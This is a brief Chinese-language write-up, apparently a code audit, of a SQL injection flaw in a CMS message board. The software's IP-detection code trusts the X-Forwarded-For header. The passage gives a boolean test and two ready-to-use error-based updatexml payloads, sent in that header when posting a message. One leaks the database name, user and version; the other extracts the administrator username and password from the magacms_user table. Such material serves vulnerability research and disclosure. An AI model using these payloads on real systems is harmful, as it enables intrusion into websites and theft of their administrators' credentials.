在留言板里面看到
再跟下function_getRealIp函数
/includes/other.fun.php
再有/admin/includes/global.fun.php
然后我们本地测试下
仅仅是监测了内网,然后我试试222.222.222.222'and 1=1
直接的输出了。那么就可以直接注入了
利用插件设置X-Forwarded-For为222.222.222.222'or updatexml(1,concat(0x3a,concat(database(),0x3a,user(),0x3a,version())),0) or'
我们再提交留言
再设置X-Forwarded-For为222.222.222.222'or updatexml(1,concat(0x3a,(select concat(username,0x3a,password)from magacms_user limit 1)),0) or'
我们再提交留言